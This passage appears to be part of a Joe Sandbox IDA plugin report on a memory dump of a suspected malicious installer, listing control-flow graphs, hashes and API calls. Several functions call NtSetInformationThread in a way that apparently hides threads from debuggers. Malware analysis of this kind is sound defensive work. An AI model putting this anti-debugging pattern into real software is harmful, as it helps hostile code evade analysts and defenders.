7890 6c793d70-6c793d8d 7881->7890 7888 6c793d90-6c793d95 7882->7888 7891 6c793dc6 7883->7891 7885 6c793dc3 7884->7885 7886 6c793c33-6c793c3a 7884->7886 7885->7883 7892 6c793c40-6c793c5b 7886->7892 7893 6c793e26-6c793e2b 7886->7893 7896 6c793dba-6c793dc1 7888->7896 7897 6c793d97-6c793db8 7888->7897 7895 6c793d50-6c793d57 7889->7895 7890->7888 7898 6c793dc8-6c793dcc 7891->7898 7899 6c793e1b-6c793e24 7892->7899 7900 6c793c7b-6c793cd0 7893->7900 7901 6c793e31 7893->7901 7915 6c793f75-6c793fa1 7894->7915 7895->7891 7896->7885 7903 6c793dd7-6c793ddc 7896->7903 7897->7883 7898->7872 7904 6c793dd2 7898->7904 7899->7898 7905 6c793e76-6c793e79 7899->7905 7900->7895 7901->7859 7907 6c793dde-6c793e17 7903->7907 7908 6c793e36-6c793e3d 7903->7908 7904->7905 7905->7877 7907->7899 7909 6c793e5c-6c793e5f 7908->7909 7910 6c793e3f-6c793e5a 7908->7910 7909->7900 7913 6c793e65-6c793e69 7909->7913 7910->7899 7913->7898 7913->7905 7919 6c794020-6c794026 7915->7919 7920 6c793fa3-6c793fa8 7915->7920 7921 6c79402c-6c79403c 7919->7921 7922 6c793f06-6c793f35 7919->7922 7923 6c79407c-6c794081 7920->7923 7924 6c793fae-6c793fcf 7920->7924 7928 6c79403e-6c794058 7921->7928 7929 6c7940b3-6c7940b8 7921->7929 7927 6c793f38-6c793f61 7922->7927 7925 6c7940aa-6c7940ae 7923->7925 7926 6c794083-6c79408a 7923->7926 7924->7925 7930 6c793f6b-6c793f6f 7925->7930 7926->7927 7931 6c794090 7926->7931 7933 6c793f64-6c793f67 7927->7933 7934 6c79405a-6c794063 7928->7934 7929->7924 7932 6c7940be-6c7940c9 7929->7932 7930->7915 7931->7894 7935 6c7940a7 7931->7935 7932->7925 7936 6c7940cb-6c7940d4 7932->7936 7937 6c793f69 7933->7937 7938 6c794069-6c79406c 7934->7938 7939 6c7940f5-6c79413f 7934->7939 7935->7925 7936->7935 7942 6c7940d6-6c7940f0 7936->7942 7937->7930 7940 6c794072-6c794077 7938->7940 7941 6c794144-6c79414b 7938->7941 7939->7937 7940->7933 7941->7930 7942->7934
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1597706638.000000006C791000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C790000, based on PE: true
                              • Associated: 0000000B.00000002.1597624216.000000006C790000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599050249.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1600616681.000000006CB03000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f19ece6dcd947847027d22b99eb0a89f3dc67037457fcd7e0f1687e0c9cf483c
                              • Instruction ID: 972263a8e8871a3819b20869472f4922b7e445271e0d5f5eae5f40d4d1a6baa2
                              • Opcode Fuzzy Hash: f19ece6dcd947847027d22b99eb0a89f3dc67037457fcd7e0f1687e0c9cf483c
                              • Instruction Fuzzy Hash: E0321532245B018FC324CF28D9D0695B7E3EFD13287698A6DC0EA4BB96D775B44ACB50
                              Function 6C793A6A Relevance: 3.1, APIs: 2, Instructions: 148threadCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7969 6c793a6a-6c793a85 7970 6c793a87-6c793aa7 7969->7970 7971 6c793aa9-6c793ab0 7970->7971 7972 6c793960-6c793964 7971->7972 7973 6c79396a 7972->7973 7974 6c793860-6c79388e 7972->7974 7975 6c793ba1-6c793bb6 7973->7975 7983 6c793970-6c79397d 7974->7983 7984 6c793894-6c793896 7974->7984 7977 6c793bc0-6c793bda call 6c8e19e0 call 6c8e19f0 7975->7977 7991 6c793be0-6c793bfe 7977->7991 7988 6c79397f-6c793989 7983->7988 7989 6c7939f1-6c7939f8 7983->7989 7984->7983 7986 6c79389c-6c7938b9 7984->7986 7990 6c7938c0-6c7938c1 7986->7990 7988->7986 7992 6c79398f-6c793994 7988->7992 7993 6c7939fe-6c793a03 7989->7993 7994 6c793ab5-6c793aba 7989->7994 7997 6c79395e 7990->7997 8013 6c793e7b 7991->8013 8014 6c793c04-6c793c11 7991->8014 8000 6c79399a-6c79399f 7992->8000 8001 6c793b16-6c793b18 7992->8001 7995 6c793a09-6c793a2f 7993->7995 7996 6c7938d2-6c7938d4 7993->7996 7994->7986 7998 6c793ac0-6c793ac7 7994->7998 8002 6c7938f8-6c793955 7995->8002 8003 6c793a35-6c793a3a 7995->8003 8004 6c793957-6c79395c 7996->8004 7997->7972 7998->7990 8005 6c793acd-6c793ad6 7998->8005 8007 6c79383b-6c793855 call 6c8e19e0 call 6c8e19f0 8000->8007 8008 6c7939a5-6c7939bf 8000->8008 8001->7990 8002->8004 8009 6c793b1d-6c793b22 8003->8009 8010 6c793a40-6c793a57 8003->8010 8004->7997 8005->8001 8012 6c793ad8-6c793aeb 8005->8012 8007->7974 8015 6c793a5a-6c793a5d 8008->8015 8019 6c793b49-6c793b50 8009->8019 8020 6c793b24-6c793b44 8009->8020 8010->8015 8012->8002 8018 6c793af1-6c793af8 8012->8018 8017 6c793e81-6c793ee0 call 6c793750 GetCurrentThread NtSetInformationThread 8013->8017 8021 6c793ce0-6c793cea 8014->8021 8022 6c793c17-6c793c20 8014->8022 8015->7971 8043 6c793eea-6c793f04 call 6c8e19e0 call 6c8e19f0 8017->8043 8028 6c793afa-6c793aff 8018->8028 8029 6c793b62-6c793b85 8018->8029 8019->7990 8023 6c793b56-6c793b5d 8019->8023 8020->7970 8025 6c793d3a-6c793d3c 8021->8025 8026 6c793cec-6c793d0c 8021->8026 8030 6c793dc5 8022->8030 8031 6c793c26-6c793c2d 8022->8031 8023->7972 8037 6c793d3e-6c793d45 8025->8037 8038 6c793d70-6c793d8d 8025->8038 8036 6c793d90-6c793d95 8026->8036 8028->8004 8029->8002 8034 6c793b8b 8029->8034 8039 6c793dc6 8030->8039 8032 6c793dc3 8031->8032 8033 6c793c33-6c793c3a 8031->8033 8032->8030 8041 6c793c40-6c793c5b 8033->8041 8042 6c793e26-6c793e2b 8033->8042 8034->7975 8045 6c793dba-6c793dc1 8036->8045 8046 6c793d97-6c793db8 8036->8046 8044 6c793d50-6c793d57 8037->8044 8038->8036 8047 6c793dc8-6c793dcc 8039->8047 8048 6c793e1b-6c793e24 8041->8048 8049 6c793c7b-6c793cd0 8042->8049 8050 6c793e31 8042->8050 8064 6c793f75-6c793fa1 8043->8064 8044->8039 8045->8032 8052 6c793dd7-6c793ddc 8045->8052 8046->8030 8047->7991 8053 6c793dd2 8047->8053 8048->8047 8054 6c793e76-6c793e79 8048->8054 8049->8044 8050->7977 8056 6c793dde-6c793e17 8052->8056 8057 6c793e36-6c793e3d 8052->8057 8053->8054 8054->8017 8056->8048 8058 6c793e5c-6c793e5f 8057->8058 8059 6c793e3f-6c793e5a 8057->8059 8058->8049 8062 6c793e65-6c793e69 8058->8062 8059->8048 8062->8047 8062->8054 8068 6c794020-6c794026 8064->8068 8069 6c793fa3-6c793fa8 8064->8069 8070 6c79402c-6c79403c 8068->8070 8071 6c793f06-6c793f35 8068->8071 8072 6c79407c-6c794081 8069->8072 8073 6c793fae-6c793fcf 8069->8073 8077 6c79403e-6c794058 8070->8077 8078 6c7940b3-6c7940b8 8070->8078 8076 6c793f38-6c793f61 8071->8076 8074 6c7940aa-6c7940ae 8072->8074 8075 6c794083-6c79408a 8072->8075 8073->8074 8079 6c793f6b-6c793f6f 8074->8079 8075->8076 8080 6c794090 8075->8080 8082 6c793f64-6c793f67 8076->8082 8083 6c79405a-6c794063 8077->8083 8078->8073 8081 6c7940be-6c7940c9 8078->8081 8079->8064 8080->8043 8084 6c7940a7 8080->8084 8081->8074 8085 6c7940cb-6c7940d4 8081->8085 8086 6c793f69 8082->8086 8087 6c794069-6c79406c 8083->8087 8088 6c7940f5-6c79413f 8083->8088 8084->8074 8085->8084 8091 6c7940d6-6c7940f0 8085->8091 8086->8079 8089 6c794072-6c794077 8087->8089 8090 6c794144-6c79414b 8087->8090 8088->8086 8089->8082 8090->8079 8091->8083
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1597706638.000000006C791000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C790000, based on PE: true
                              • Associated: 0000000B.00000002.1597624216.000000006C790000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599050249.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1600616681.000000006CB03000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: CurrentThread
                              • String ID:
                              • API String ID: 2882836952-0
                              • Opcode ID: 3eb60d0c2388ed686f9d4d8a6fcf4f312a720c2094db611815b55ba2f94e2965
                              • Instruction ID: 2385ddbb7d0816f05fcdd892ee2c45eeccdad0f31fdde821b6d2462e99f9e8b5
                              • Opcode Fuzzy Hash: 3eb60d0c2388ed686f9d4d8a6fcf4f312a720c2094db611815b55ba2f94e2965
                              • Instruction Fuzzy Hash: 1351E231148B018FC320CF28D980795B7E3BF96314F698B5DC0EA5BA96DB74B44A9B51
                              Function 6C7939CF Relevance: 3.1, APIs: 2, Instructions: 139threadCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1597706638.000000006C791000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C790000, based on PE: true
                              • Associated: 0000000B.00000002.1597624216.000000006C790000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599050249.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1600616681.000000006CB03000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: CurrentThread
                              • String ID:
                              • API String ID: 2882836952-0
                              • Opcode ID: 44a0c13e7e6d76fdc7ba829206cd2697ddc9281dc1543315dfb00704b3006529
                              • Instruction ID: 122c0796fb59c6ccd1a3eae685fe7b156417c3e35931d17dbe6979889f156254
                              • Opcode Fuzzy Hash: 44a0c13e7e6d76fdc7ba829206cd2697ddc9281dc1543315dfb00704b3006529
                              • Instruction Fuzzy Hash: 7351D331148B018FC320CF28D580795B7E3BF96324F698F5DC0EA5BA96DB71B44A9B91
                              Function 6C793D18 Relevance: 3.1, APIs: 2, Instructions: 89threadnativeCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentThread.KERNEL32 ref: 6C793E9D
                              • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C793EAA
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1597706638.000000006C791000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C790000, based on PE: true
                              • Associated: 0000000B.00000002.1597624216.000000006C790000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599050249.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1600616681.000000006CB03000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: Thread$CurrentInformation
                              • String ID:
                              • API String ID: 1650627709-0
                              • Opcode ID: 7cc112b0f0148b57d28b214ef6b91d4c21c575a0a12715ac4231e37fb997f571
                              • Instruction ID: 700c1cf54072a0bac08503d52ea3fc80f96a6a8e5ff468e17e57e56807db32df
                              • Opcode Fuzzy Hash: 7cc112b0f0148b57d28b214ef6b91d4c21c575a0a12715ac4231e37fb997f571
                              • Instruction Fuzzy Hash: 8731E131249B018BC320CF28D9947C6B7A3AF96318F698B5DC0AA5BA92DB7474099B51
                              Function 6C793D62 Relevance: 3.1, APIs: 2, Instructions: 83threadnativeCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentThread.KERNEL32 ref: 6C793E9D
                              • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C793EAA
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1597706638.000000006C791000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C790000, based on PE: true
                              • Associated: 0000000B.00000002.1597624216.000000006C790000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599050249.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1600616681.000000006CB03000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: Thread$CurrentInformation
                              • String ID:
                              • API String ID: 1650627709-0
                              • Opcode ID: af5a9f8bfcc21cc3733ce029148d3337113254a5afab6bff400d333f53b841f8
                              • Instruction ID: 8a6f75966cb32e1ab900cc4f1ab51c28b757f6e291735d1b9e0e6cacd475a72b
                              • Opcode Fuzzy Hash: af5a9f8bfcc21cc3733ce029148d3337113254a5afab6bff400d333f53b841f8
                              • Instruction Fuzzy Hash: CA312F31108B01CBC324CF28D690796B7B7BF96308F294E5DC0EA4BA92DB71B449DB91
                              Function 6C793C62 Relevance: 3.1, APIs: 2, Instructions: 72threadnativeCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentThread.KERNEL32 ref: 6C793E9D
                              • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C793EAA
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1597706638.000000006C791000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C790000, based on PE: true
                              • Associated: 0000000B.00000002.1597624216.000000006C790000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599050249.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1600616681.000000006CB03000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: Thread$CurrentInformation
                              • String ID:
                              • API String ID: 1650627709-0
                              • Opcode ID: 87d276e0cfdeb4d7d857365355a3dc3b3dc76036ca43e45e2686b5ce9cd6c08a
                              • Instruction ID: 18792d758f35a4da6d828bf10ecad38fb5568ab8b97668e82ee4e67ce1408c66
                              • Opcode Fuzzy Hash: 87d276e0cfdeb4d7d857365355a3dc3b3dc76036ca43e45e2686b5ce9cd6c08a
                              • Instruction Fuzzy Hash: B021F431158B018BD324CF28D99479677B7AF56348F584F2DC0BA8BA91DB74B4049B51
                              Function 6C915690 Relevance: 3.1, APIs: 2, Instructions: 72COMMON
                              Download Yara Rule
                              APIs
                              • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6C9156A0
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1597706638.000000006C791000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C790000, based on PE: true
                              • Associated: 0000000B.00000002.1597624216.000000006C790000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599050249.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1600616681.000000006CB03000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: ManagerOpen
                              • String ID:
                              • API String ID: 1889721586-0
                              • Opcode ID: 752acf1b80a8a27c3f91b599bb1555c7986a54de3da3af26c5f303696bc78aec
                              • Instruction ID: 62eca5c5ed20664621331be990b2083aad699d74e4717d6b46b17d68ed83efb3
                              • Opcode Fuzzy Hash: 752acf1b80a8a27c3f91b599bb1555c7986a54de3da3af26c5f303696bc78aec
                              • Instruction Fuzzy Hash: 12314AB460C346EFD700CF28C596B4ABBF4AB89768F51885EF899C6760C371C8459B63
                              Function 6C90B430 Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON
                              Download Yara Rule
                              APIs
                              • FindFirstFileA.KERNEL32(?,?), ref: 6C90B44C
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1597706638.000000006C791000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C790000, based on PE: true
                              • Associated: 0000000B.00000002.1597624216.000000006C790000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599050249.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1600616681.000000006CB03000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: FileFindFirst
                              • String ID:
                              • API String ID: 1974802433-0
                              • Opcode ID: 3f1d0cf6460c1ef2eb733728777691d11cb4ab635cf28734d00104dd45a26d72
                              • Instruction ID: 05fd383452951d1bfe6b3e9468e56f974307111480864475406419056c016e96
                              • Opcode Fuzzy Hash: 3f1d0cf6460c1ef2eb733728777691d11cb4ab635cf28734d00104dd45a26d72
                              • Instruction Fuzzy Hash: 71113674608351AFD7008B29D58451EBBF4AF86318F148E5DF4A8CBB91D330CD888B02
                              Function 6C8EAFA0 Relevance: 44.5, APIs: 3, Strings: 22, Instructions: 734fileCOMMON
                              Download Yara Rule
                              APIs
                              • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6C8EB117
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1597706638.000000006C791000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C790000, based on PE: true
                              • Associated: 0000000B.00000002.1597624216.000000006C790000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599050249.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1600616681.000000006CB03000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: FileRead
                              • String ID: $53N!$53N!$H$I_#]$J_#]$J_#]$Y<Uq$Y<Uq$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$f@n`$f@n`$jinc$|
                              • API String ID: 2738559852-1563143607
                              • Opcode ID: 3a9b43ad0fd70f55e7dd6f7573c21ec98e6b949e88ecb394e0b4ad903058f431
                              • Instruction ID: 9682016936c5ee14bb5a21393798bf1cfebb94097ea12dd9973605951bd0e06f
                              • Opcode Fuzzy Hash: 3a9b43ad0fd70f55e7dd6f7573c21ec98e6b949e88ecb394e0b4ad903058f431
                              • Instruction Fuzzy Hash: 5862497060D3858FC724CF28C590A6ABBE1ABDA314F248D1EF4A9CB751D735E8458B4B
                              Function 6C92D043 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301COMMONLIBRARYCODE
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 6824 6c92d043-6c92d053 6825 6c92d055-6c92d068 call 6c91ff4f call 6c91ff3c 6824->6825 6826 6c92d06d-6c92d06f 6824->6826 6843 6c92d3ec 6825->6843 6828 6c92d3d4-6c92d3e1 call 6c91ff4f call 6c91ff3c 6826->6828 6829 6c92d075-6c92d07b 6826->6829 6845 6c92d3e7 call 6c920690 6828->6845 6829->6828 6832 6c92d081-6c92d0a7 6829->6832 6832->6828 6833 6c92d0ad-6c92d0b6 6832->6833 6836 6c92d0d0-6c92d0d2 6833->6836 6837 6c92d0b8-6c92d0cb call 6c91ff4f call 6c91ff3c 6833->6837 6841 6c92d3d0-6c92d3d2 6836->6841 6842 6c92d0d8-6c92d0db 6836->6842 6837->6845 6847 6c92d3ef-6c92d3f2 6841->6847 6842->6841 6848 6c92d0e1-6c92d0e5 6842->6848 6843->6847 6845->6843 6848->6837 6851 6c92d0e7-6c92d0fe 6848->6851 6853 6c92d100-6c92d103 6851->6853 6854 6c92d14f-6c92d155 6851->6854 6857 6c92d113-6c92d119 6853->6857 6858 6c92d105-6c92d10e 6853->6858 6855 6c92d157-6c92d161 6854->6855 6856 6c92d11b-6c92d132 call 6c91ff4f call 6c91ff3c call 6c920690 6854->6856 6859 6c92d163-6c92d165 6855->6859 6860 6c92d168-6c92d186 call 6c924d65 call 6c924d2b * 2 6855->6860 6888 6c92d307 6856->6888 6857->6856 6861 6c92d137-6c92d14a 6857->6861 6862 6c92d1d3-6c92d1e3 6858->6862 6859->6860 6897 6c92d1a3-6c92d1cc call 6c92b1d9 6860->6897 6898 6c92d188-6c92d19e call 6c91ff3c call 6c91ff4f 6860->6898 6861->6862 6865 6c92d2a8-6c92d2b1 call 6c931f55 6862->6865 6866 6c92d1e9-6c92d1f5 6862->6866 6877 6c92d2b3-6c92d2c5 6865->6877 6878 6c92d324 6865->6878 6866->6865 6870 6c92d1fb-6c92d1fd 6866->6870 6870->6865 6875 6c92d203-6c92d227 6870->6875 6875->6865 6879 6c92d229-6c92d23f 6875->6879 6877->6878 6883 6c92d2c7-6c92d2d6 GetConsoleMode 6877->6883 6882 6c92d328-6c92d340 ReadFile 6878->6882 6879->6865 6885 6c92d241-6c92d243 6879->6885 6886 6c92d342-6c92d348 6882->6886 6887 6c92d39c-6c92d3a7 GetLastError 6882->6887 6883->6878 6889 6c92d2d8-6c92d2dc 6883->6889 6885->6865 6890 6c92d245-6c92d26b 6885->6890 6886->6887 6894 6c92d34a 6886->6894 6892 6c92d3c0-6c92d3c3 6887->6892 6893 6c92d3a9-6c92d3bb call 6c91ff3c call 6c91ff4f 6887->6893 6896 6c92d30a-6c92d314 call 6c924d2b 6888->6896 6889->6882 6895 6c92d2de-6c92d2f8 ReadConsoleW 6889->6895 6890->6865 6899 6c92d26d-6c92d283 6890->6899 6904 6c92d300-6c92d306 call 6c91ff62 6892->6904 6905 6c92d3c9-6c92d3cb 6892->6905 6893->6888 6901 6c92d34d-6c92d35f 6894->6901 6906 6c92d2fa GetLastError 6895->6906 6907 6c92d319-6c92d322 6895->6907 6896->6847 6897->6862 6898->6888 6899->6865 6908 6c92d285-6c92d287 6899->6908 6901->6896 6913 6c92d361-6c92d365 6901->6913 6904->6888 6905->6896 6906->6904 6907->6901 6908->6865 6911 6c92d289-6c92d2a3 6908->6911 6911->6865 6918 6c92d367-6c92d377 call 6c92d46e 6913->6918 6919 6c92d37e-6c92d389 6913->6919 6931 6c92d37a-6c92d37c 6918->6931 6925 6c92d395-6c92d39a call 6c92d726 6919->6925 6926 6c92d38b call 6c92d3f3 6919->6926 6932 6c92d390-6c92d393 6925->6932 6926->6932 6931->6896 6932->6931
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1597706638.000000006C791000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C790000, based on PE: true
                              • Associated: 0000000B.00000002.1597624216.000000006C790000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599050249.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1600616681.000000006CB03000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID: 8Q
                              • API String ID: 0-4022487301
                              • Opcode ID: d68846fe5555026fe13cf892f92be90cbb690a932f1f43eb033a55d91ab1de6b
                              • Instruction ID: 018473658db19bef78c5d496ebede96b2c910a9854fbb3111cbae645f4e8631c
                              • Opcode Fuzzy Hash: d68846fe5555026fe13cf892f92be90cbb690a932f1f43eb033a55d91ab1de6b
                              • Instruction Fuzzy Hash: 8EC13772E182499FDF05DF99C880BADBBB4AF5A31CF104158E494ABF85C778D906CB60
                              Function 6C9345DC Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 6933 6c9345dc-6c93460c call 6c934a5c 6936 6c934627-6c934633 call 6c931b7c 6933->6936 6937 6c93460e-6c934619 call 6c91ff4f 6933->6937 6943 6c934635-6c93464a call 6c91ff4f call 6c91ff3c 6936->6943 6944 6c93464c-6c934695 call 6c9349c7 6936->6944 6942 6c93461b-6c934622 call 6c91ff3c 6937->6942 6953 6c934901-6c934905 6942->6953 6943->6942 6951 6c934702-6c93470b GetFileType 6944->6951 6952 6c934697-6c9346a0 6944->6952 6958 6c934754-6c934757 6951->6958 6959 6c93470d-6c93473e GetLastError call 6c91ff62 CloseHandle 6951->6959 6956 6c9346a2-6c9346a6 6952->6956 6957 6c9346d7-6c9346fd GetLastError call 6c91ff62 6952->6957 6956->6957 6962 6c9346a8-6c9346d5 call 6c9349c7 6956->6962 6957->6942 6960 6c934760-6c934766 6958->6960 6961 6c934759-6c93475e 6958->6961 6959->6942 6970 6c934744-6c93474f call 6c91ff3c 6959->6970 6965 6c93476a-6c9347b8 call 6c931d20 6960->6965 6966 6c934768 6960->6966 6961->6965 6962->6951 6962->6957 6976 6c9347d7-6c9347ff call 6c934c80 6965->6976 6977 6c9347ba-6c9347c6 call 6c934bd6 6965->6977 6966->6965 6970->6942 6982 6c934801-6c934802 6976->6982 6983 6c934804-6c934845 6976->6983 6977->6976 6984 6c9347c8 6977->6984 6985 6c9347ca-6c9347d2 call 6c92be95 6982->6985 6986 6c934847-6c93484b 6983->6986 6987 6c934866-6c934874 6983->6987 6984->6985 6985->6953 6986->6987 6988 6c93484d-6c934861 6986->6988 6989 6c93487a-6c93487e 6987->6989 6990 6c9348ff 6987->6990 6988->6987 6989->6990 6993 6c934880-6c9348b3 CloseHandle call 